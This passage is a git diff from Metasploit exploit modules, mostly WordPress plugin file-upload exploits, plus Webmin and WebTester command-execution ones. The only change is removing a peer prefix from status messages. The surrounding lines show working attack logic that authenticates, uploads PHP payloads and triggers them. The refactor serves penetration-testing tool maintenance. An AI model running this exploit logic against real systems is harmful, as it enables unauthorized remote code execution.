Msf::Exploit::Remote if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? - print_error("#{peer} - Valid web client session not found, trying to create one...") + print_error("Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") end - print_good("#{peer} - Exploitation looks feasible, proceeding... ") + print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 29c80dd4bf..1579b33cc9 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Attempting to login...") + vprint_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.get_cookies =~ /sid/ - vprint_good "#{peer} - Authentication successful" + vprint_good "Authentication successful" session = res.get_cookies.split("sid=")[1].split(";")[0] else - vprint_error "#{peer} - Service found, but authentication failed" + vprint_error "Service found, but authentication failed" return Exploit::CheckCode::Detected end - vprint_status("#{peer} - Attempting to execute...") + vprint_status("Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -121,18 +121,18 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to execute the payload...") + print_status("Attempting to execute the payload...") command = payload.encoded @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - print_good "#{peer} - Payload executed successfully" + print_good "Payload executed successfully" else - print_error "#{peer} - Error executing the payload" + print_error "Error executing the payload" return end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 7d6f169d17..5817ebf9d4 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - vprint_status("#{peer} - Found version: 5.1.20101016") + vprint_status("Found version: 5.1.20101016") return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - vprint_status("#{peer} - Found version: #{$1}") + vprint_status("Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cppassword', 'cpdomain' ] - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...") + print_status("Sending payload (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install2.php'), @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 and res.body =~ /Failed to connect to database server/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::Unknown, "#{peer} - Something went wrong") end diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 7c9f49e32a..1ab30f176f 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -68,22 +68,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded - print_status("#{peer} - Executing the payload at #{payload_uri}...") + print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 9f07c15816..06b6f4b909 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -76,20 +76,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Trying to login as #{username}") + vprint_status("Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? - vprint_status("#{peer} - Trying to get nonce") + vprint_status("Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? - vprint_status("#{peer} - Trying to upload payload") + vprint_status("Trying to upload payload") # This must be default.php filename = 'default.php' - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file") + print_status("Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 9d0cbd7ce6..dc6b8ca785 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'), @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f09d836152..f86704f106 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 3504f81df9..ced2ed7f8c 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"") - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'post.php'), @@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/ uploaded_filename = res.body register_files_for_cleanup(uploaded_filename) - print_status("#{peer} - File #{uploaded_filename} successfully uploaded") + print_status("File #{uploaded_filename} successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename) - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( { 'uri' => file_path, diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 9d554ee3e2..39b948f6d9 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -111,29 +111,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication - vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + vprint_status("WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication - print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + print_status("Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + print_warning("Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") end end - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, @@ -152,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? - vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_error("Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if !res.nil? && res.code == 404 - print_error("#{peer} - Failed to upload the payload") + print_error("Failed to upload the payload") else - print_good("#{peer} - Executed payload") + print_good("Executed payload") end end end diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 1fefb811ca..10b9d39bbd 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") - print_status("#{peer} - Sending PHP payload") + print_status("Sending PHP payload") res = send_request_cgi( 'method' => 'POST', @@ -67,19 +67,19 @@ class Metasploit3 < Msf::Exploit::Remote ) if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end filename = "#{Regexp.last_match[1]}.php" - print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + print_good("Our payload is at: #{filename}. Calling payload...") register_files_for_cleanup(filename) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) ) - print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + print_error("Server returned #{res.code}") if res && res.code != 200 end end diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 1fb64e7e7c..525d1dfce9 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -46,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(5)}.php" - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'), @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") }, 5 diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 50f0daf8e2..4ae974b7a5 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -64,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index f06a853ea6..cacccd0f7d 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body.include?(php_page_name) - print_good("#{peer} - Our payload is at: #{php_page_name}.") + print_good("Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not answer') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 6338d3ed78..99deba5747 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -66,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end - print_status("#{peer} - Calling payload ...") + print_status("Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 806e529145..485c58a950 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue JSON::ParserError fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename') end - print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + print_good("Our payload is at: #{new_php_pagename}. Calling payload...") register_files_for_cleanup(new_php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown,'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index a0a6ac4c0e..2fc0fe33ca 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) #get upload filepath - print_status("#{peer} - Getting the upload path...") + print_status("Getting the upload path...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") n_data = post_data.to_s @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") end - print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + print_good("Payload uploaded successfully. Disclosing the payload path...") #get path to payload res = send_request_cgi({ 'method' => 'GET', @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(File::basename(u.path)) - print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...") + print_good("Our payload is at: #{u.path}! Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => u.path diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 765e103f5a..cbc7e40b53 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) data = generate_mime_message(payload, payload_name) upload_dir = "#{Rex::Text.rand_text_alpha(5)}/" - print_status("#{peer} - Uploading payload to #{upload_dir}...") + print_status("Uploading payload to #{upload_dir}...") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? @@ -105,17 +105,17 @@ class Metasploit3 < Msf::Exploit::Remote uploaded_name = json['files'][0]['name'][0..-5] php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name) - print_good("#{peer} - Parsed response") + print_good("Parsed response") register_files_for_cleanup(php_file_name) register_files_for_cleanup("../#{uploaded_name}.zip") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") end rescue fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 48bc1b3f85..00226d4e6b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site") end - print_status("#{peer} - Starting up web service...") + print_status("Starting up web service...") start_service payload_uri = generate_payload_uri - vprint_status("#{peer} - Using URI #{payload_uri}") + vprint_status("Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload #{random_file_name}...") + print_status("Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") datastore['TRIES'].times do |i| payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" res = call_payload(payload_name) @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - vprint_error("#{peer} - It doesn't look like a WordPress site") + vprint_error("It doesn't look like a WordPress site") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 18118ed20c..2321cede00 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('pagelines', nil, nil, 'form-data; name="page"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 567ac81937..3e83952a77 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => request_uri, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote upload_uri = normalize_uri(res.body) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 363b9441a4..564aaead50 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /success|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 6ae240b2d9..5e229750e1 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) - print_good("#{peer} - Our payload is at: #{final_uri}") - print_status("#{peer} - Calling payload...") + print_good("Our payload is at: #{final_uri}") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index b1f4e67ad4..830cb7cea6 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -60,14 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) diff --git 